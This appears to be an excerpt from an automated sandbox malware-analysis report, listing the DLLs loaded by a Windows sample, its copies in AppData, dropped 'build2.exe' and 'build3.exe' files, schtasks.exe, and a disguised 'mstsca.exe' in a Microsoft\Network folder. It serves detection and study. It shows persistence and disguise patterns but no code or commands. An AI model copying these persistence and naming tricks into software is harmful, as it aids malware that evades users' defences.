Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: drprov.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: ntlanman.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: davclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: davhlpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: browcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: drprov.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: ntlanman.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: davclnt.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: davhlpr.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: wkscli.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: cscapi.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: browcli.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	Section loaded: dbghelp.dll
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	Section loaded: sxs.dll
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build3.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build3.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build3.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build3.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build3.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build3.exe	Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: srvcli.dll
